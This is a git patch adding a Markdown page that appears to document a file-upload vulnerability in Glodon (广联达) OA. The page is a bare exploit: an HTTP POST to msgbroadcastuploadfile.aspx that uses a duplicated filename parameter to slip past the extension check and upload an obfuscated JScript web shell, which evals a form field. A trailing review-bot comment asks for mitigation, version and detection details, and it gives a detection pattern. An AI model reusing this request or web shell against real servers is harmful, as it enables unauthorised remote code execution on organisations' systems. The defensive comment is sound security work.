From d132e7e2f9b92a7b7795730529996151be3a7864 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 22:03:38 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=B9=BF=E8=81=94=E8=BE=BEoa=20?= =?UTF-8?q?=E5=90=8E=E5=8F=B0=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
广联达oa 后台文件上传漏洞.md | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 广联达oa 后台文件上传漏洞.md
diff --git a/广联达oa 后台文件上传漏洞.md b/广联达oa 后台文件上传漏洞.md
new file mode 100644
index 0000000..2018271
--- /dev/null
+++ b/广联达oa 后台文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 广联达oa 后台文件上传漏洞
+
+```
+POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
+Host: 10.10.10.1:8888
+X-Requested-With: Ext.basex
+Accept: text/html, application/xhtml+xml, image/jxr, */*
+Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Origin: http://10.10.10.1
+Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
+Cookie:
+Connection: close
+Content-Length: 421
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
+Content-Type: application/text
+
+<%@ Page Language="Jscript" Debug=true%>
+<%
+var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
+var GFMA=Request.Form("qmq1");
+var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
+eval(GFMA, ONOQ);
+%>
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
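Review bot: The new page is a bare request capture with no explanatory text, so a reader cannot tell which product versions are affected, whether an authenticated session is required (the title says 后台, yet the `Cookie:` header is empty), or how to remediate and detect the issue. The security-relevant detail is the `Content-Disposition` line carrying two `filename` parameters with different extensions, which presumably makes the extension check and the stored file name disagree; the page should say so in a sentence rather than leave it implicit. I would add a short section such as `Mitigation: validate the extension of the name actually written to disk against an allow-list, and disable script execution in the upload directory`, together with an affected-version line (`<AFFECTED_VERSIONS: not stated on this page>`). A detection hint would also help defenders: alert on POSTs to `/gtp/im/services/group/msgbroadcastuploadfile.aspx` whose multipart part header repeats `filename`, and on new `.aspx` files appearing under upload paths.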